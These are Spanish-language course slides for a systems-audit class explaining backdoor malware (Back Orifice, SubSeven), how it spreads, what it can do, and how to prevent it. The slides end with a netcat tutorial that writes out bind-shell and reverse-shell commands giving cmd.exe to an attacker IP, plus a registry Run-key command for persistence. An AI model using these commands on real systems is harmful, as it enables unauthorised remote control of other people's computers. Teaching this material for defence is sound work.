BACKDOORS

AUDITORIA DE SISTEMAS

SOFTWARE MALINTENCIONADO

Software malintencionado o “malware” (malicious software): término para designar un programa informático que provoca de forma intencionada una acción dañina para el sistema y/o usuario.

Software malintencionado o “malware” (malicious software): término para designar un programa informático que provoca de forma intencionada una acción dañina para el sistema y/o usuario.

Tipos de malwareTipos de malware

definición clásica Virus Gusanos Troyanos Bombas lógicas

definición clásica Virus Gusanos Troyanos Bombas lógicas

ampliación Spyware Backdoors Keyloggers Dialers RootKits Exploits …

ampliación Spyware Backdoors Keyloggers Dialers RootKits Exploits …

evoluciónevolución

TIPOS DE MALWARE: BACKDOOR

Backdoor: o puerta trasera, permite acceso y control remoto de un sistema sin una autentificación legítima.Backdoor: o puerta trasera, permite acceso y control remoto de un sistema sin una autentificación legítima.

EjemploEjemplo

Backdoor BackOrifice

módulo cliente (atacante) y módulo servidor (víctima)

servidor .exe por defecto abre puerto TCP/31337

atacante obtiene control total sobre la víctima

lectura/escritura de archivos, ejecutar aplicaciones, reiniciar el sistema, visualizar la pantalla, manejar el ratón y teclado de la víctima, robar contraseñas, etc.

Backdoor BackOrifice

módulo cliente (atacante) y módulo servidor (víctima)

servidor .exe por defecto abre puerto TCP/31337

atacante obtiene control total sobre la víctima

lectura/escritura de archivos, ejecutar aplicaciones, reiniciar el sistema, visualizar la pantalla, manejar el ratón y teclado de la víctima, robar contraseñas, etc.

Los más conocidos son Back Orifice y NetBus, dos de los primeros backdoors, que hasta nuestros días siguen vigentes aunque en menor cantidad.

Otro muy conocido es el SubSeven, que también fue introducido en millones de sistemas en el mundo.

Los más conocidos son Back Orifice y NetBus, dos de los primeros backdoors, que hasta nuestros días siguen vigentes aunque en menor cantidad.

Otro muy conocido es el SubSeven, que también fue introducido en millones de sistemas en el mundo.

LOS MAS CONOCIDOS

W32 afecta a plataformas Windows 32bits

W95 afecta a plataformas Windows 9X/Me

WM virus de macro para Word

XM virus de macro para Excel

Worm gusano

Troj troyano

Bck backdoor

VBS escrito en Visual Basic Script

JS escrito en Java Script

Joke broma

@mm se propaga por e-mail de forma masiva

W32 afecta a plataformas Windows 32bits

W95 afecta a plataformas Windows 9X/Me

WM virus de macro para Word

XM virus de macro para Excel

Worm gusano

Troj troyano

Bck backdoor

VBS escrito en Visual Basic Script

JS escrito en Java Script

Joke broma

@mm se propaga por e-mail de forma masiva

Prefijos y sufijos más comunesPrefijos y sufijos más comunes

NOMENCLATURA EN LA IDENTIFICACIÓN DEL MALWARE

BACKDOORS

Un backdoor es un programa que se introduce en el ordenador de manera encubierta, aparentando ser inofensivo. Una vez es ejecutado, establece una "puerta trasera" a través de la cual es posible controlar el ordenador afectado. Esto permite realizar en el mismo acciones que pueden comprometer la confidencialidad del usuario o dificultar su trabajo.

Las acciones permitidas por los backdoors pueden resultar muy perjudiciales. Entre ellas se encuentran la eliminación de ficheros o la destrucción de la información del disco duro. Además, pueden capturar y reenviar datos confidenciales a una dirección externa o abrir puertos de comunicaciones, permitiendo que un posible intruso controle nuestro ordenador de forma remota.

Algunos ejemplos de backdoors son: Orifice2K.sfx, Bionet.318, Antilam y Subseven.213.

BACKDOORS

CONCEPTOS

• Serie de aplicaciones o de secuencias de código que

permiten el acceso no autorizado de un usuario/intruso a un sistema.

• 65535 puertos TCP/IP destinados a correr servicios

• Su misión es pasar desapercibidos, y estar a la escucha hasta que el atacante lo use.

• Aprovechan bugs en los sistemas o son creadas por el programador para tener acceso al mismo.

BACKDOORS

CONCEPTOS

• Los Backdoors, han empezado a consolidarse como la temible nueva generación del vandalismo cibernético.

• Pueden tomar el control de los sistemas infiltrados: Servidores, Estaciones de Trabajo o PCs.

• Los Backdoors no son esencialmente virus, sino "Herramientas de Control Remoto“ con fines malintencionados.

BACKDOORS

Estructura de los Backdoors

• Tienen dos componentes principales: el programa Servidor, que se instala en el sistema de la víctima y el programa Cliente que actúa en la computadora del atacante.

• Establecen una relación Cliente/Servidor.

• El atacante puede ejecutar remotamente acciones con privilegios de administrador.

Ejecutar aplicaciones

Abrir archivos adjuntos

Ingenieria Social

Configuración débil del sistema operativo

Configuración débil de aplicaciones Internet

Vulnerabilidades del S.O. y aplicaciones

Ejecutar aplicaciones

Abrir archivos adjuntos

Ingenieria Social

Configuración débil del sistema operativo

Configuración débil de aplicaciones Internet

Vulnerabilidades del S.O. y aplicaciones

BACKDOORS

Formas de PropagaciónFormas de Propagación

TroyanosTroyanos

Camuflados dentro de otro programa conocido que nos pueda interesar:

"Última versión de photoshop+crack descárgalo ahora".

En este caso la Backdoor se instalara en segundo plano mientras se instala la aplicación descargada. De esta forma el usuario no se dará por enterado de nada.

Camuflados dentro de otro programa conocido que nos pueda interesar:

"Última versión de photoshop+crack descárgalo ahora".

En este caso la Backdoor se instalara en segundo plano mientras se instala la aplicación descargada. De esta forma el usuario no se dará por enterado de nada.

BACKDOORS

Mensajes de Correo ElectrónicoMensajes de Correo Electrónico

Es la forma más fácil de propagación; por medio de un archivo adjunto a un mensaje.

Si el receptor comete el error de ejecutarlo, instalará el Servidor del Backdoor sin saberlo, permitiendo que el intruso pueda controlar el sistema infectado.

postales, fotos pornográficas,…

Es la forma más fácil de propagación; por medio de un archivo adjunto a un mensaje.

Si el receptor comete el error de ejecutarlo, instalará el Servidor del Backdoor sin saberlo, permitiendo que el intruso pueda controlar el sistema infectado.

postales, fotos pornográficas,…

BACKDOORS

TelnetTelnet

Emulación de terminal para las redes TCP/IP.

Funcionan en modo Cliente/Servidor permitiendo ejecutar comandos en el equipo infectado.

El intruso a través del Telnet puede ejecutar cada instrucción como si la hubiera ingresado directamente en la consola de la maquina local.

Emulación de terminal para las redes TCP/IP.

Funcionan en modo Cliente/Servidor permitiendo ejecutar comandos en el equipo infectado.

El intruso a través del Telnet puede ejecutar cada instrucción como si la hubiera ingresado directamente en la consola de la maquina local.

BACKDOORS

Otras FormasOtras Formas

Redes Compartidas

Otros servicios de Internet (HTTP, FTP, ICQ, Chat, Mensajería Instantánea)

Usuarios de una misma red local o por medio de unidades de almacenamiento extraible.

El sabotaje interno.

Redes Compartidas

Otros servicios de Internet (HTTP, FTP, ICQ, Chat, Mensajería Instantánea)

Usuarios de una misma red local o por medio de unidades de almacenamiento extraible.

El sabotaje interno.

BACKDOORS

•Extraer y enviar información del sistema al intruso. •Robar o alterar passwords.•Anular procesos en ejecución. •Mostrar mensajes en la pantalla.•Manipular el Mouse/Teclado.•Mostrar/ocultar la Barra de Tareas.•Abrir y cerrar la bandeja del CD.•Reiniciar el sistema.•Formatear el disco duro.

•Extraer y enviar información del sistema al intruso. •Robar o alterar passwords.•Anular procesos en ejecución. •Mostrar mensajes en la pantalla.•Manipular el Mouse/Teclado.•Mostrar/ocultar la Barra de Tareas.•Abrir y cerrar la bandeja del CD.•Reiniciar el sistema.•Formatear el disco duro.

CAPACIDADES DE LOS BACKDOORS

RECOMENDACIONES

Visión actual en la prevenciónVisión actual en la prevención

Filtrado y protección de las comunicaciones.

Actualización de software (parches de seguridad).

Monitoreo intensivo y Auditoria.

No usar Claves de Acceso con nombres obvios o asociados al de los usuarios, como fechas de nacimiento, apelativos, etc.

Una estricta política de manejo y control de los usuarios en carpetas compartidas

Filtrado y protección de las comunicaciones.

Actualización de software (parches de seguridad).

Monitoreo intensivo y Auditoria.

No usar Claves de Acceso con nombres obvios o asociados al de los usuarios, como fechas de nacimiento, apelativos, etc.

Una estricta política de manejo y control de los usuarios en carpetas compartidas

RECOMENDACIONES

Factor S.O. y aplicacionesFactor S.O. y aplicaciones

Desactivar los servicios no necesarios.

Aplicar actualizaciones automáticas

Configuración segura navegador y correo

Políticas de uso de portátiles, PDAs, memorias USB.

Segmentación lógica redes

Políticas de privilegios según usuario y aplicaciones

Políticas de seguridad de recursos compartidos

Políticas de backups

Desactivar los servicios no necesarios.

Aplicar actualizaciones automáticas

Configuración segura navegador y correo

Políticas de uso de portátiles, PDAs, memorias USB.

Segmentación lógica redes

Políticas de privilegios según usuario y aplicaciones

Políticas de seguridad de recursos compartidos

Políticas de backups

RECOMENDACIONES

Factor S.O. y aplicacionesFactor S.O. y aplicaciones

Educar / formar al usuario. Cultura de seguridad.

Formatos potencialmente peligrosos

No abrir archivos no solicitados

No utilizar fuentes no confiables

Navegación segura

Política de passwords

Copias de seguridad

Educar / formar al usuario. Cultura de seguridad.

Formatos potencialmente peligrosos

No abrir archivos no solicitados

No utilizar fuentes no confiables

Navegación segura

Política de passwords

Copias de seguridad

RECOMENDACIONES

Factor humanoFactor humano

BACKDOOR CON NETCAT

LISTADO DE COMANDOS

-d modo oculto o demonio (queda ejecutándose sin interactuar con el equipo) -e prog ejecuta programa indicado a continuación del parámetro (usado para shells remotas) -g gateway source-routing hop point, up to 8 -G num source-routing pointer: 4, 8, 12, ... -h Ayuda -i secs tiempo de espera para líneas enviadas o entre puertos escaneados -l escucha de conexiones entrantes (tras sesión TCP/UDP deja de escuchar) -L como -l pero permanece escuchando tras sesión TCP/UDP -n no realiza resoluciones DNS (realizadas por defecto) -o file hex dump of traffic -p port número de puerto -r randomize local and remote ports -s addr local source address -t responde negociaciones TELNET -u modo UDP (por defecto es TCP) -v modo detallado(-v -v es aun más detallado) -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning>

BACKDOOR CON NETCAT: CONEXION DIRECTA

Escenario: Equipo atacante 192.168.1.3 Equipo victima 192.168.1.10

lo primero es dejar un netcat en la victima de la siguiente manera:

nc -d -l -L -e cmd.exe -p 1234

Este comando le dice al nc que abra el puerto 1234 y nos espere con una consola (cmd.exe)

Ahora solo debemos conectarnos a la victima, abrimos el netcat y ejecutamos el comando:

nc -vv 192.168.1.10 1234

BACKDOOR CON NETCAT: CONEXION INVERSA

En este tipo de conexión no somos nosotros los que nos conectamos a la victima, sino es la victima la que se conecta a nosotros.

Lo primero es dejar en nuestro sistema un netcat de la siguiente forma:

nc -vv -l -L -p 8080

ahora nuestro sistema esta preparado para recibir conecciones al puerto 8080, solo queda dejar en el equipo victima un netcat de la siguiente manera:

nc -d -e cmd.exe 192.168.1.3 8080

BACKDOOR CON NETCAT: COMO BACKDOOR

Desde la consola se ejecuta:

Reg add

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/v user32 /d C:\windows\system32\nc "parametros“

Parametros:

nc -d -L -l -e cmd.exe -p <puerto> 'que se quede en un puerto a la escucha.

nc -d -e cmd.exe <IP> <puerto> ' que se conecte a una ip.

Preguntas y respuestas

Defina el modo de funcionamiento de los BackdoorDefina el modo de funcionamiento de los Backdoor

Describa los componentes de los Backdoors y su funcion.Describa los componentes de los Backdoors y su funcion.

Describa los modos de propagacion de los BackdoorsDescriba los modos de propagacion de los Backdoors

Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas a los sistemas.Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas a los sistemas.

Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas al factor humano.Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas al factor humano.